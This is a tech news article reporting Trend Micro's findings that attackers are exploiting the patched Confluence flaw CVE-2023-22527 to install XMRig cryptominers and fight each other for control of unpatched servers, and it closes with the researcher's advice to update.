Major Atlassian flaw hacks systems for crypto mining

News
By published

Multiple groups are competing for control over vulnerable endpoints

Crypto mining
Kryptovaluuttojen louhinta on tehokkainta oikeilla komponenteilla. (Image credit: Shutterstock / Yevhen Vitte)
Jump to:

Atlassian Confluence Data Center and Confluence Server used to carry a maximum severity vulnerability that allowed threat actors to remotely run any malicious code.

Despite the fix being available for months now, there are many unprotected endpoints out there.

As a result, hackers have been observed installing cryptocurrency miners on these devices, raking up huge electricity bills to the victims, as well as rendering their devices practically unusable.

Fighting for control

This is according to a new report from cybersecurity researchers Trend Micro. Published earlier this week, the report argues that crooks are competing with one another, deleting and installing cryptominers regularly.

The vulnerability is tracked as CVE-2023-22527. It is a critical, 10/10 severity flaw that allows for remote code execution, and that was patched in mid-January this year. However, since mid-June this year, crooks started scanning for vulnerable instances, dropping the XMRig miner where possible. XMRig is the most popular cryptominer out there, generating the Monero (XMR) cryptocurrency. Monero is described as a privacy coin, as it is virtually untraceable.

"The attacks involve threat actors that employ methods such as the deployment of shell scripts and XMRig miners, targeting of SSH endpoints, killing competing crypto mining processes, and maintaining persistence via cron jobs," Trend Micro researcher Abdelrahman Esmail said.

The part about “killing competing crypto mining processes” is particularly interesting. The researcher said that there are at least three different actors struggling to maintain control over these endpoints. Once they compromise the device, they will use a shell script to terminate previous miners, delete all existing cron jobs, uninstall cloud security tools, and gather system information. After that, they will set up a channel with the C2 server, and launch a new miner.

"With its continuous exploitation by threat actors, CVE-2023-22527 presents a significant security risk to organizations worldwide," the researcher added. "To minimize the risks and threats associated with this vulnerability, administrators should update their versions of Confluence Data Center and Confluence Server to the latest available versions as soon as possible."

Via The Hacker News

More from TechRadar Pro

Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

Read more
A person at a laptop with a cybersecure lock symbol floating above it.
Cybercrime gang targets victims with "triple threat" attacks
A person's fingers type at a keyboard, with a digital security screen with a lock on it overlaid.
Apache Foundation urges users to patch now and fix major security worries
botnet
YouTubers targeted by blackmail campaign to promote malware on their channels
Dark Web monitoring
A worrying critical security flaw in Apache Tomcat could let hackers take over servers with ease
Abstract image of cyber security in action.
MassJacker malware targets those looking for pirated software
Flag of the People's Republic of China overlaid with a technological network of wires and circuits.
One of the biggest flaws exploited by Salt Typhoon hackers has had a patch available for years
Latest in Security
Insecure network with several red platforms connected through glowing data lines and a black hat hacker symbol
Coinbase targeted after recent Github attacks
IBM office logo
IBM to provide platform for flagship cyber skills programme for girls
Oracle
Oracle denies data breach after hacker claims to hold six million records
Hacker silhouette working on a laptop with North Korean flag on the background
North Korea unveils new military unit targeting AI attacks
An image of network security icons for a network encircling a digital blue earth.
US government warns agencies to make sure their backups are safe from NAKIVO security issue
Laptop computer displaying logo of WordPress, a free and open-source content management system (CMS)
This top WordPress plugin could be hiding a worrying security flaw, so be on your guard
Latest in News
A phone showing a ChatGPT app error message
ChatGPT is down for many – here's what's going on
A woman sitting in a chair looking at a Windows 11 laptop
It looks like Microsoft might have thought better about banishing Copilot AI shortcut from Windows 11
Tesla Roadster 2
Tesla is still taking deposits on its long overdue Roadster, despite promising it would arrive in 2020
Samsung HW-Q990D soundbar with Halloween theme over the top
Samsung promises to repair soundbars bricked by its disastrous software update for free – but it'll probably involve shipping
Google Gemini AI
Gmail is adding a new Gemini AI tool to help smarten up your work emails
DJI Mavic 3 Pro
More DJI Mavic 4 Pro leaks seemingly reveal launch date, price and key features of the triple camera drone – here's what to expect
More about security
Insecure network with several red platforms connected through glowing data lines and a black hat hacker symbol

Coinbase targeted after recent Github attacks
Oracle

Oracle denies data breach after hacker claims to hold six million records
A phone showing a ChatGPT app error message

ChatGPT is down for many – here's what's going on
See more latest
Most Popular
A phone showing a ChatGPT app error message
ChatGPT is down for many – here's what's going on
A woman sitting in a chair looking at a Windows 11 laptop
It looks like Microsoft might have thought better about banishing Copilot AI shortcut from Windows 11
Insecure network with several red platforms connected through glowing data lines and a black hat hacker symbol
Coinbase targeted after recent Github attacks
Surface Laptop 7
Amazon warns customers about the Surface Laptop – and it’s not just bad news for Microsoft
vector isometric illustration of a handheld gaming console
SteamOS is about to change handheld gaming PCs as HP finally considers ditching Windows 11
Oracle
Oracle denies data breach after hacker claims to hold six million records
Tesla Roadster 2
Tesla is still taking deposits on its long overdue Roadster, despite promising it would arrive in 2020
DJI Mavic 3 Pro
More DJI Mavic 4 Pro leaks seemingly reveal launch date, price and key features of the triple camera drone – here's what to expect
De'Longhi Linea Classic espresso machine on kitchen counter with hot and cold coffee drinks
I'm a qualified barista, and De'Longhi's latest espresso machine could be this year's best budget buy for coffee lovers
Man sitting on sofa, drinking coffee, looking at phone in surprise
Thousands of coffee lovers warned to stop using their espresso machines immediately after reports of burns and lacerations